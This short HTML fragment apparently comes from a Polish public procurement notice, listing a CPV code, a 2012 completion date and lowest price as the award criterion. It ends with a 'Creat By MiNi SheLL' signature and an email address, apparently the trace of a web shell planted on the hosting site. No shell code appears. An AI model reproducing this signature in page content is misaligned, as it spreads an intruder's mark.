<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com